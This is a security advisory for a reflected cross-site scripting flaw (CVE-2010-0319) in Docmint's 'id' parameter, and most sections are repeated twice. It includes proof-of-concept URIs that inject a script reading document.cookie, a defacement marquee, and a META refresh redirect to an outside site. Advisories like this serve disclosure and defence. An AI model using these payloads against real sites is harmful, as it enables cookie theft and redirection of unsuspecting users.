Docmint 'id' Parameter Cross Site Scripting Vulnerability
BID:37721
Info
Docmint 'id' Parameter Cross Site Scripting Vulnerability
| Bugtraq ID: | 37721 |
| Class: | Input Validation Error |
| CVE: |
CVE-2010-0319 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 12 2010 12:00AM |
| Updated: | Apr 13 2015 09:03PM |
| Credit: | Red-D3v1L |
| Vulnerable: |
Docmint Docmint 2.1 Docmint Docmint 1.0 |
| Not Vulnerable: | |
Discussion
Docmint 'id' Parameter Cross Site Scripting Vulnerability
Docmint is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Docmint 1.0 is vulnerable; versions 2.1 and higher are also vulnerable; other versions may be affected as well.
Docmint is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Docmint 1.0 is vulnerable; versions 2.1 and higher are also vulnerable; other versions may be affected as well.
Exploit / POC
Docmint 'id' Parameter Cross Site Scripting Vulnerability
Attackers can exploit this issue by enticing an unsuspecting user to follow a malicious URI.
The following example URIs are available:
http://www.example.com/index.php?id='"><script>alert(document.cookie)</script>
http://www.example.com/index.php?id=<marquee><font color=Red size=16>Th3 RDX/font></marquee>
http://www.example.com/index.php?id=<HTML><HEAD><TITLE>Redirect...</TITLE><META HTTP-EQUIV="REFRESH" CONTENT="0; URL=http://www.inj3ct0r.com"></HEAD><BODY>Redirect in corso...</BODY></HTML>
Attackers can exploit this issue by enticing an unsuspecting user to follow a malicious URI.
The following example URIs are available:
http://www.example.com/index.php?id='"><script>alert(document.cookie)</script>
http://www.example.com/index.php?id=<marquee><font color=Red size=16>Th3 RDX/font></marquee>
http://www.example.com/index.php?id=<HTML><HEAD><TITLE>Redirect...</TITLE><META HTTP-EQUIV="REFRESH" CONTENT="0; URL=http://www.inj3ct0r.com"></HEAD><BODY>Redirect in corso...</BODY></HTML>
Solution / Fix
Docmint 'id' Parameter Cross Site Scripting Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].